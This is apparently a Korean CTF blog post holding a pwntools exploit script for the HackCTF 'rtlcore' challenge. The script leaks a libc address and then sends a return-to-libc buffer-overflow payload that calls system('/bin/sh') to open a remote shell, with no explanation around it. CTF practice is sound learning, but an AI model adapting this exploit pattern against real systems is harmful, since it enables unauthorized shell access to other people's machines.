Exploit Code

from pwn import *
#p=process('./rtlcore')
p=remote('ctf.j0n9hyun.xyz', 3015)

libc = ELF('./libc.so.6')
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
printf_offset = libc.symbols['printf']
system_offset = libc.symbols['system']
binsh_offset = libc.search("/bin/sh").next()



pause()
payload = '\xa7\xb0\xd9\xc0'+'\x00'*16
p.sendlineafter(': ', payload)

p.recvuntil('0x')
printf = int(p.recv(8),16)
libc_base = printf - printf_offset
system = libc_base + system_offset
binsh = libc_base + binsh_offset
log.info('libc_base : '+hex(libc_base))

payload = 'A'*(0x3e+4)+p32(system)+'A'*4+p32(binsh)
p.sendlineafter('\n', payload)
p.interactive()

'Writeup [pwn] > HackCTF' 카테고리의 다른 글

World Best Encryption Tool  (0) 2020.03.07
Unexploitable #1  (0) 2020.03.07
ROP  (0) 2020.03.07
Beginner_Heap  (0) 2020.03.07
babyheap  (0) 2020.03.07

+ Recent posts

티스토리툴바